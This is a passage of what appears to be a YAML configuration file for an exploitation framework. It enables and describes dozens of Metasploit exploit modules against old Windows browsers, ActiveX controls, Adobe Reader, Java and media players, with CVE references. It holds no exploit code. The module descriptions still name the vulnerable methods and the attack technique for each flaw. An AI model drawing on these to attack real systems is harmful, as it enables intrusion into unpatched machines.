+msf_macrovision_downloadandexecute: + enable: true + msf: true + msf_key: windows/browser/macrovision_downloadandexecute + name: Macrovision InstallShield Update Service Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Macrovision InstallShield Update\n\ + \t\t\t\tService(Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to\n\ + \t\t\t\tthe DownloadAndExecute method, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5660 + - - OSVDB + - "38347" + - - URL + - http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059288.html + path: extensions/metasploit/ + class: Msf_module +msf_webdav_dll_hijacker: + enable: true + msf: true + msf_key: windows/browser/webdav_dll_hijacker + name: WebDAV Application DLL Hijacker + category: Metasploit + description: "\n\ + \t\t\t\tThis module presents a directory of file extensions that can lead to\n\ + \t\t\tcode execution when opened from the share. The default EXTENSIONS option\n\ + \t\t\tmust be configured to specify a vulnerable application type.\n\ + \t\t\t" + authors: + - - URL + - http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html + - - URL + - http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt + path: extensions/metasploit/ + class: Msf_module +msf_adobe_flatedecode_predictor02: + enable: true + msf: true + msf_key: windows/fileformat/adobe_flatedecode_predictor02 + name: Adobe FlateDecode Stream Predictor 02 Integer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an integer overflow vulnerability in Adobe Reader and Adobe\n\ + \t\t\t\tAcrobat Professional versions before 9.2.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3459 + - - BID + - "36600" + - - OSVDB + - "58729" + - - URL + - http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html + - - URL + - http://www.adobe.com/support/security/bulletins/apsb09-15.html + - - URL + - http://www.fortiguard.com/analysis/pdfanalysis.html + path: extensions/metasploit/ + class: Msf_module +msf_winamp_ultravox: + enable: true + msf: true + msf_key: windows/browser/winamp_ultravox + name: Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Winamp 5.24. By\n\ + \t\t\t\tsending an overly long artist tag, a remote attacker may\n\ + \t\t\t\tbe able to execute arbitrary code. This vulnerability can be\n\ + \t\t\t\texploited from the browser or the winamp client itself.\n\ + \t\t\t" + authors: + - - CVE + - 2008-0065 + - - OSVDB + - "41707" + - - BID + - "27344" + path: extensions/metasploit/ + class: Msf_module +msf_baofeng_storm_onbeforevideodownload: + enable: true + msf: true + msf_key: windows/browser/baofeng_storm_onbeforevideodownload + name: BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX\n\ + \t\t\t\tcontrol. Verions of mps.dll including 3.9.4.27 and lower are affected. When passing\n\ + \t\t\t\tan overly long string to the method \"OnBeforeVideoDownload\" an attacker can execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-1612 + - - OSVDB + - "54169" + - - BID + - "34789" + - - URL + - http://www.exploit-db.com/exploits/8579 + path: extensions/metasploit/ + class: Msf_module +msf_adobe_media_newplayer: + enable: true + msf: true + msf_key: windows/fileformat/adobe_media_newplayer + name: Adobe Doc.media.newPlayer Use After Free Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\n\ + \t\t\t\tProfessional versions up to and including 9.2.\n\ + \t\t\t" + authors: + - - CVE + - 2009-4324 + - - BID + - "37331" + - - OSVDB + - "60980" + path: extensions/metasploit/ + class: Msf_module +msf_oracle_dc_submittoexpress: + enable: true + msf: true + msf_key: windows/browser/oracle_dc_submittoexpress + name: Oracle Document Capture 10g ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).\n\ + \t\t\t\tOracle Document Capture 10g comes bundled with a third party ActiveX control\n\ + \t\t\t\temsmtp.dll (6.0.1.0). When passing a overly long string to the method \"SubmitToExpress\"\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-4607 + - - OSVDB + - "38335" + - - BID + - "25467" + - - US-CERT-VU + - "281977" + path: extensions/metasploit/ + class: Msf_module +msf_ms08_070_visual_studio_msmask: + enable: true + msf: true + msf_key: windows/browser/ms08_070_visual_studio_msmask + name: Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0.\n\ + \t\t\t\tWhen passing a specially crafted string to the Mask parameter of the\n\ + \t\t\t\tMsmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary\n\ + \t\t\t\tcode.\n\ + \t\t\t" + authors: + - - CVE + - 2008-3704 + - - OSVDB + - "47475" + - - BID + - "30674" + - - MSB + - MS08-070 + path: extensions/metasploit/ + class: Msf_module +msf_macrovision_unsafe: + enable: true + msf: true + msf_key: windows/browser/macrovision_unsafe + name: Macrovision InstallShield Update Service ActiveX Unsafe Method + category: Metasploit + description: "\n\ + \t\t\t\tThis module allows attackers to execute code via an unsafe methods in Macrovision InstallShield 2008.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5660 + - - OSVDB + - "38347" + - - BID + - "26280" + path: extensions/metasploit/ + class: Msf_module +msf_nctaudiofile2_setformatlikesample: + enable: true + msf: true + msf_key: windows/browser/nctaudiofile2_setformatlikesample + name: NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the NCTAudioFile2.Audio ActiveX\n\ + \t\t\t\tControl provided by various audio applications. By sending a overly long\n\ + \t\t\t\tstring to the \"SetFormatLikeSample()\" method, an attacker may be able to\n\ + \t\t\t\texecute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-0018 + - - OSVDB + - "32032" + - - BID + - "22196" + - - US-CERT-VU + - "292713" + - - URL + - http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/062911.html + path: extensions/metasploit/ + class: Msf_module +msf_ms10_022_ie_vbscript_winhlp32: + enable: true + msf: true + msf_key: windows/browser/ms10_022_ie_vbscript_winhlp32 + name: Internet Explorer Winhlp32.exe MsgBox Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a code execution vulnerability that occurs when a user\n\ + \t\t\t\tpresses F1 on MessageBox originated from VBscript within a web page. When the\n\ + \t\t\t\tuser hits F1, the MessageBox help functionaility will attempt to load and use\n\ + \t\t\t\ta HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server.\n\n\ + \t\t\t\tThis particular version of the exploit implements a WebDAV server that will\n\ + \t\t\t\tserve HLP file as well as a payload EXE. During testing warnings about the\n\ + \t\t\t\tpayload EXE being unsigned were witnessed. A future version of this module\n\ + \t\t\t\tmight use other methods that do not create such a warning.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0483 + - - OSVDB + - "62632" + - - MSB + - MS10-023 + - - URL + - http://www.microsoft.com/technet/security/advisory/981169.mspx + - - URL + - http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx + - - URL + - http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt + path: extensions/metasploit/ + class: Msf_module +msf_sapgui_saveviewtosessionfile: + enable: true + msf: true + msf_key: windows/browser/sapgui_saveviewtosessionfile + name: SAP AG SAPgui EAI WebViewer3D Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Siemens Unigraphics Solutions\n\ + \t\t\t\tTeamcenter Visualization EAI WebViewer3D ActiveX control that is bundled\n\ + \t\t\t\twith SAPgui. When passing an overly long string the SaveViewToSessionFile()\n\ + \t\t\t\tmethod, arbitrary code may be executed.\n\ + \t\t\t" + authors: + - - CVE + - 2007-4475 + - - OSVDB + - "53066" + - - US-CERT-VU + - "985449" + path: extensions/metasploit/ + class: Msf_module +msf_lpviewer_url: + enable: true + msf: true + msf_key: windows/browser/lpviewer_url + name: iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When\n\ + \t\t\t\tsending an overly long string to the URL() property an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-4384 + - - OSVDB + - "48946" + - - US-CERT-VU + - "848873" + - - BID + - "31604" + path: extensions/metasploit/ + class: Msf_module +msf_amaya_bdo: + enable: true + msf: true + msf_key: windows/browser/amaya_bdo + name: Amaya Browser v11.0 bdo tag overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Amaya v11 Browser.\n\ + \t\t\t\t\tBy sending an overly long string to the \"bdo\"\n\ + \t\t\t\t\ttag, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-0323 + - - OSVDB + - "55721" + - - BID + - 33046, 33047 + path: extensions/metasploit/ + class: Msf_module +msf_xmplay_asx: + enable: true + msf: true + msf_key: windows/browser/xmplay_asx + name: XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in XMPlay 3.3.0.4.\n\ + \t\t\t\tThe vulnerability is caused due to a boundary error within\n\ + \t\t\t\tthe parsing of playlists containing an overly long file name.\n\ + \t\t\t\tThis module uses the ASX file format.\n\ + \t\t\t" + authors: + - - CVE + - 2006-6063 + - - OSVDB + - "30537" + - - BID + - "21206" + - - URL + - http://secunia.com/advisories/22999/ + path: extensions/metasploit/ + class: Msf_module +msf_java_basicservice_impl: + enable: true + msf: true + msf_key: windows/browser/java_basicservice_impl + name: Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit + category: Metasploit + description: "\n\ + \t\t\tThis module exploits a vulnerability in Java Runtime Environment\n\ + \t\t\tthat allows an attacker to escape the Java Sandbox. By injecting\n\ + \t\t\ta parameter into a javaws call within the BasicServiceImpl class\n\ + \t\t\tthe default java sandbox policy file can be therefore overwritten.\n\ + \t\t\tThe vulnerability affects version 6 prior to update 22.\n\n\ + \t\t\tNOTE: Exploiting this vulnerability causes several sinister-looking\n\ + \t\t\tpopup windows saying that Java is \"Downloading application.\"\n\ + \t\t\t" + authors: + - - CVE + - 2010-3563 + - - OSVDB + - "69043" + - - URL + - http://mk41ser.blogspot.com + path: extensions/metasploit/ + class: Msf_module +msf_cisco_anyconnect_exec: + enable: true + msf: true + msf_key: windows/browser/cisco_anyconnect_exec + name: Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the Cisco AnyConnect VPN client \n\ + \t\t\t\tvpnweb.ocx ActiveX control. This control is typically used to install the \n\ + \t\t\t\tVPN client. An attacker can set the 'url' property which is where the control\n\ + \t\t\t\ttries to locate the files needed to install the client.\n\n\ + \t\t\t\t\tThe control tries to download two files from the site specified within the\n\ + \t\t\t\t'url' property. One of these files it will be stored in a temporary directory and \n\ + \t\t\t\texecuted.\n\ + \t\t\t\t\t" + authors: + - - CVE + - 2011-2039 + - - OSVDB + - "72714" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=909 + - - URL + - http://www.cisco.com/en/US/products/products_security_advisory09186a0080b80123.shtml + path: extensions/metasploit/ + class: Msf_module +msf_ie_iscomponentinstalled: + enable: true + msf: true + msf_key: windows/browser/ie_iscomponentinstalled + name: Internet Explorer isComponentInstalled Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Internet Explorer. This bug was\n\ + \t\t\t\tpatched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.\n\ + \t\t\t" + authors: + - - CVE + - 2006-1016 + - - OSVDB + - "31647" + - - BID + - "16870" + path: extensions/metasploit/ + class: Msf_module +msf_athocgov_completeinstallation: + enable: true + msf: true + msf_key: windows/browser/athocgov_completeinstallation + name: AtHocGov IWSAlerts ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in AtHocGov IWSAlerts. When\n\ + \t\t\t\tsending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll\n\ + \t\t\t\t(6.1.4.36) an attacker may be able to execute arbitrary code. This\n\ + \t\t\t\tvulnerability was silently patched by the vendor.\n\ + \t\t\t" + authors: + - - URL + - http://www.athoc.com/products/IWSAlerts_overview.aspx + path: extensions/metasploit/ + class: Msf_module +msf_mirc_irc_url: + enable: true + msf: true + msf_key: windows/browser/mirc_irc_url + name: mIRC IRC URL Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in mIRC 6.1. By\n\ + \t\t\t\tsubmitting an overly long and specially crafted URL to\n\ + \t\t\t\tthe 'irc' protocol, an attacker can overwrite the buffer\n\ + \t\t\t\tand control program execution.\n\ + \t\t\t" + authors: + - - CVE + - 2003-1336 + - - OSVDB + - "2665" + - - BID + - "8819" + path: extensions/metasploit/ + class: Msf_module +msf_symantec_backupexec_pvcalendar: + enable: true + msf: true + msf_key: windows/browser/symantec_backupexec_pvcalendar + name: Symantec BackupExec Calendar Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Symantec BackupExec Calendar Control.\n\ + \t\t\t\tBy sending an overly long string to the \"_DOWText0\" property located\n\ + \t\t\t\tin the pvcalendar.ocx control, an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-6016 + - - OSVDB + - "42358" + - - BID + - "26904" + - - URL + - http://secunia.com/advisories/27885/ + path: extensions/metasploit/ + class: Msf_module +msf_ms10_002_aurora: + enable: true + msf: true + msf_key: windows/browser/ms10_002_aurora + name: Internet Explorer "Aurora" Memory Corruption + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a memory corruption flaw in Internet Explorer. This\n\ + \t\t\t\tflaw was found in the wild and was a key component of the \"Operation Aurora\"\n\ + \t\t\t\tattacks that lead to the compromise of a number of high profile companies. The\n\ + \t\t\t\texploit code is a direct port of the public sample published to the Wepawet\n\ + \t\t\t\tmalware analysis site. The technique used by this module is currently identical\n\ + \t\t\t\tto the public sample, as such, only Internet Explorer 6 can be reliably exploited.\n\ + \t\t\t" + authors: + - - MSB + - MS10-002 + - - CVE + - 2010-0249 + - - OSVDB + - "61697" + - - URL + - http://www.microsoft.com/technet/security/advisory/979352.mspx + - - URL + - http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js + path: extensions/metasploit/ + class: Msf_module +msf_blackice_downloadimagefileurl: + enable: true + msf: true + msf_key: windows/browser/blackice_downloadimagefileurl + name: Black Ice Cover Page ActiveX Control Arbitrary File Download + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module allows remote attackers to place arbitrary files on a users file system\n\ + \t\t\t\tby abusing the \"DownloadImageFileURL\" method in the Black Ice BIImgFrm.ocx ActiveX\n\ + \t\t\t\tControl (BIImgFrm.ocx 12.0.0.0). Code exeuction can be acheived by first uploading the\n\ + \t\t\t\tpayload to the remote machine, and then upload another mof file, which enables Windows\n\ + \t\t\t\tManagement Instrumentation service to execute the binary. Please note that this module\n\ + \t\t\t\tcurrently only works for Windows before Vista. Also, a similar issue is reported in\n\ + \t\t\t\tBIDIB.ocx (10.9.3.0) within the Barcode SDK.\n\ + \t\t\t" + authors: + - - CVE + - 2008-2683 + - - OSVDB + - "46007" + - - BID + - "29577" + - - URL + - http://www.exploit-db.com/exploits/5750/ + path: extensions/metasploit/ + class: Msf_module +msf_hpmqc_progcolor: + enable: true + msf: true + msf_key: windows/browser/hpmqc_progcolor + name: HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack-based buffer overflow in SPIDERLib.Loader\n\ + \t\t\t\tActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD)\n\ + \t\t\t\tfor Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and\n\ + \t\t\t\t8.2 SP1 before Patch 32.\n\ + \t\t\t\tBy setting an overly long value to 'ProgColor', an attacker can overrun\n\ + \t\t\t\ta buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-1819 + - - OSVDB + - "34317" + - - BID + - "23239" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=497 + path: extensions/metasploit/ + class: Msf_module +msf_ie_createobject: + enable: true + msf: true + msf_key: windows/browser/ie_createobject + name: Internet Explorer COM CreateObject Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a generic code execution vulnerability in Internet\n\ + \t\t\t\tExplorer by abusing vulnerable ActiveX objects.\n\ + \t\t\t" + authors: + - - MSB + - MS06-014 + - - CVE + - 2006-0003 + - - OSVDB + - "24517" + - - MSB + - MS06-073 + - - CVE + - 2006-4704 + - - OSVDB + - "30155" + path: extensions/metasploit/ + class: Msf_module +msf_mswhale_checkforupdates: + enable: true + msf: true + msf_key: windows/browser/mswhale_checkforupdates + name: Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\n\ + \t\t\t\tGateway Whale Client. When sending an overly long string to CheckForUpdates()\n\ + \t\t\t\tmethod of WhlMgr.dll (3.1.502.64) an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-2238 + - - OSVDB + - "53933" + - - URL + - http://technet.microsoft.com/en-us/library/dd282918.aspx + path: extensions/metasploit/ + class: Msf_module +msf_ms06_055_vml_method: + enable: true + msf: true + msf_key: windows/browser/ms06_055_vml_method + name: Internet Explorer VML Fill Method Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a code execution vulnerability in Microsoft Internet Explorer using\n\ + \t\t\t\ta buffer overflow in the VML processing code (VGX.dll). This module has been tested on\n\ + \t\t\t\tWindows 2000 SP4, Windows XP SP0, and Windows XP SP2.\n\ + \t\t\t" + authors: + - - CVE + - 2006-4868 + - - OSVDB + - "28946" + - - MSB + - MS06-055 + - - BID + - "20096" + path: extensions/metasploit/ + class: Msf_module +msf_mozilla_interleaved_write: + enable: true + msf: true + msf_key: windows/browser/mozilla_interleaved_write + name: Mozilla Firefox Interleaving document.write and appendChild Exploit + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a code execution vulnerability in Mozilla\n\ + \t\t\t\tFirefox caused by interleaved calls to document.write and appendChild.\n\ + \t\t\t\tThis exploit is a metasploit port of the in-the-wild exploit.\n\ + \t\t\t" + authors: + - - CVE + - 2010-3765 + - - OSVDB + - "68905" + - - BID + - "15352" + - - URL + - http://www.exploit-db.com/exploits/15352/ + - - URL + - https://bugzilla.mozilla.org/show_bug.cgi?id=607222 + - - URL + - http://www.mozilla.org/security/announce/2010/mfsa2010-73.html + path: extensions/metasploit/ + class: Msf_module +msf_novelliprint_callbackurl: + enable: true + msf: true + msf_key: windows/browser/novelliprint_callbackurl + name: Novell iPrint Client ActiveX Control call-back-url Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.\n\ + \t\t\t\tWhen sending an overly long string to the 'call-back-url' parameter in an\n\ + \t\t\t\top-client-interface-version action of ienipp.ocx an attacker may be able to\n\ + \t\t\t\texecute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2010-1527 + - - OSVDB + - "67411" + - - URL + - http://secunia.com/secunia_research/2010-104/ + - - URL + - http://www.exploit-db.com/exploits/15042/ + path: extensions/metasploit/ + class: Msf_module +msf_vlc_amv: + enable: true + msf: true + msf_key: windows/browser/vlc_amv + name: VLC AMV Dangling Pointer Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits VLC media player when handling a .AMV file. By flipping the 0x41st\n\ + \t\t\t\tbyte in the file format (video width/height), VLC crashes due to an invalid pointer, which\n\ + \t\t\t\tallows remote attackers to gain arbitrary code execution.\n\ + \t\t\t\t\n\ + \t\t\t\tThe vulnerable packages include:\n\ + \t\t\t\tVLC 1.1.4\n\ + \t\t\t\tVLC 1.1.5\n\ + \t\t\t\tVLC 1.1.6\n\ + \t\t\t\tVLC 1.1.7\n\ + \t\t\t\t" + authors: + - - CVE + - 2010-3275 + - - OSVDB + - "71277" + - - URL + - http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files + - - URL + - http://git.videolan.org/?p=vlc/vlc-1.1.git;a=commitdiff;h=fe44129dc6509b3347113ab0e1a0524af1e0dd11 + path: extensions/metasploit/ + class: Msf_module +msf_persits_xupload_traversal: + enable: true + msf: true + msf_key: windows/browser/persits_xupload_traversal + name: Persits XUpload ActiveX MakeHttpRequest Directory Traversal + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a directory traversal in Persits Software Inc's\n\ + \t\t\t\tXUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5.\n\ + \t\t\t\tBy passing a string containing \"..\\\" sequences to the MakeHttpRequest method,\n\ + \t\t\t\tan attacker is able to write arbitrary files to arbitrary locations on disk.\n\n\ + \t\t\t\tCode execution occurs by writing to the All Users Startup Programs directory.\n\ + \t\t\t\tYou may want to combine this module with the use of multi/handler since a\n\ + \t\t\t\tuser would have to log for the payloda to execute.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3693 + - - OSVDB + - "60001" + - - URL + - http://retrogod.altervista.org/9sg_hp_loadrunner.html + path: extensions/metasploit/ + class: Msf_module +msf_ms10_090_ie_css_clip: + enable: true + msf: true + msf_key: windows/browser/ms10_090_ie_css_clip + name: Internet Explorer CSS SetUserClip Memory Corruption + category: Metasploit + description: "\n\ + \t\t\t\t\tThie module exploits a memory corruption vulnerability within Microsoft's\n\ + \t\t\t\tHTML engine (mshtml). When parsing an HTML page containing a specially\n\ + \t\t\t\tcrafted CSS tag, memory corruption occurs that can lead arbitrary code\n\ + \t\t\t\texecution.\n\n\ + \t\t\t\tIt seems like Microsoft code inadvertantly increments a vtable pointer to\n\ + \t\t\t\tpoint to an unaligned address within the vtable's function pointers. This\n\ + \t\t\t\tleads to the program counter being set to the address determined by the\n\ + \t\t\t\taddress \"[vtable+0x30+1]\". The particular address depends on the exact\n\ + \t\t\t\tversion of the mshtml library in use.\n\n\ + \t\t\t\tSince the address depends on the version of mshtml, some versions may not\n\ + \t\t\t\tbe exploitable. Specifically, those ending up with a program counter value\n\ + \t\t\t\twithin another module, in kernel space, or just not able to be reached with\n\ + \t\t\t\tvarious memory spraying techniques.\n\n\ + \t\t\t\tAlso, since the address is not controllable, it is unlikely to be possible\n\ + \t\t\t\tto use ROP to bypass non-executable memory protections.\n\ + \t\t\t" + authors: + - - CVE + - 2010-3962 + - - OSVDB + - "68987" + - - BID + - "44536" + - - URL + - http://www.microsoft.com/technet/security/advisory/2458511.mspx + - - URL + - http://www.exploit-db.com/exploits/15421/ + - - MSB + - MS10-090 + path: extensions/metasploit/ + class: Msf_module +msf_ebook_flipviewer_fviewerloading: + enable: true + msf: true + msf_key: windows/browser/ebook_flipviewer_fviewerloading + name: FlipViewer FViewerLoading ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in E-BOOK Systems FlipViewer 4.0.\n\ + \t\t\t\tThe vulnerability is caused due to a boundary error in the\n\ + \t\t\t\tFViewerLoading (FlipViewerX.dll) ActiveX control when handling the\n\ + \t\t\t\t\"LoadOpf()\" method.\n\ + \t\t\t" + authors: + - - CVE + - 2007-2919 + - - OSVDB + - "37042" + - - BID + - "24328" + path: extensions/metasploit/ + class: Msf_module +msf_ms09_002_memory_corruption: + enable: true + msf: true + msf_key: windows/browser/ms09_002_memory_corruption + name: Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits an error related to the CFunctionPointer function when attempting\n\ + \t\t\t\tto access uninitialized memory. A remote attacker could exploit this vulnerability to\n\ + \t\t\t\tcorrupt memory and execute arbitrary code on the system with the privileges of the victim.\n\ + \t\t\t" + authors: + - - CVE + - 2009-0075 + - - OSVDB + - "51839" + - - MSB + - MS09-002 + path: extensions/metasploit/ + class: Msf_module +msf_adobe_geticon: + enable: true + msf: true + msf_key: windows/fileformat/adobe_geticon + name: Adobe Collab.getIcon() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n\ + \t\t\t\tAffected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n\ + \t\t\t\tcrafted pdf that a contains malformed Collab.getIcon() call, an attacker may\n\ + \t\t\t\tbe able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-0927 + - - OSVDB + - "53647" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-09-014/ + path: extensions/metasploit/ + class: Msf_module +msf_systemrequirementslab_unsafe: + enable: true + msf: true + msf_key: windows/browser/systemrequirementslab_unsafe + name: Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module allows attackers to execute code via an unsafe method in\n\ + \t\t\t\tHusdawg, LLC. System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0)\n\ + \t\t\t" + authors: + - - CVE + - 2008-4385 + - - OSVDB + - "50122" + - - US-CERT-VU + - "166651" + path: extensions/metasploit/ + class: Msf_module +msf_msvidctl_mpeg2: + enable: true + msf: true + msf_key: windows/browser/msvidctl_mpeg2 + name: Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a memory corruption within the MSVidCtl component of Microsoft\n\ + \t\t\t\tDirectShow (BDATuner.MPEG2TuneRequest).\n\ + \t\t\t\tBy loading a specially crafted GIF file, an attacker can overrun a buffer and\n\ + \t\t\t\texecute arbitrary code.\n\n\ + \t\t\t\tClassID is now configurable via an advanced option (otherwise randomized) - I)ruid\n\ + \t\t\t" + authors: + - - CVE + - 2008-0015 + - - OSVDB + - "55651" + - - BID + - "35558" + - - MSB + - MS09-032 + - - MSB + - MS09-037 + - - URL + - http://www.microsoft.com/technet/security/advisory/972890.mspx + path: extensions/metasploit/ + class: Msf_module +msf_symantec_altirisdeployment_runcmd: + enable: true + msf: true + msf_key: windows/browser/symantec_altirisdeployment_runcmd + name: Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Symantec Altiris Deployment Solution.\n\ + \t\t\t\tWhen sending an overly long string to RunCmd() method of\n\ + \t\t\t\tAeXNSConsoleUtilities.dll (6.0.0.1426) an attacker may be able to execute arbitrary\n\ + \t\t\t\tcode.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3033 + - - BID + - "37092" + - - OSVDB + - "60496" + path: extensions/metasploit/ + class: Msf_module +msf_adobe_shockwave_rcsl_corruption: + enable: true + msf: true + msf_key: windows/browser/adobe_shockwave_rcsl_corruption + name: Adobe Shockwave rcsL Memory Corruption + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a weakness in the Adobe Shockwave player's handling of\n\ + \t\t\t\tDirector movies (.DIR). A memory corruption vulnerability occurs through an undocumented\n\ + \t\t\t\trcsL chunk. This vulnerability was discovered by http://www.abysssec.com.\n\ + \t\t\t" + authors: + - - CVE + - 2010-3653 + - - OSVDB + - "68803" + - - URL + - http://www.exploit-db.com/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip + path: extensions/metasploit/ + class: Msf_module +msf_logitechvideocall_start: + enable: true + msf: true + msf_key: windows/browser/logitechvideocall_start + name: Logitech VideoCall ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Logitech VideoCall ActiveX\n\ + \t\t\t\tControl (wcamxmp.dll 2.0.3470.448). By sending a overly long string to the\n\ + \t\t\t\t\"Start()\" method, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-2918 + - - OSVDB + - "36820" + - - BID + - "24254" + path: extensions/metasploit/ + class: Msf_module +msf_novelliprint_getdriversettings: + enable: true + msf: true + msf_key: windows/browser/novelliprint_getdriversettings + name: Novell iPrint Client ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 4.34. When\n\ + \t\t\t\tsending an overly long string to the GetDriverSettings() property of ienipp.ocx\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-2908 + - - OSVDB + - "46194" + - - URL + - http://secunia.com/advisories/30709/ + path: extensions/metasploit/ + class: Msf_module +msf_mysql_payload: + enable: true + msf: true + msf_key: windows/mysql/mysql_payload + name: Oracle MySQL for Microsoft Windows Payload Execution + category: Metasploit + description: "\n\ + \t\t\t\tThis module creates and enables a custom UDF (user defined function) on the\n\ + \t\t\t\ttarget host via the SELECT ... into DUMPFILE method of binary injection. On\n\ + 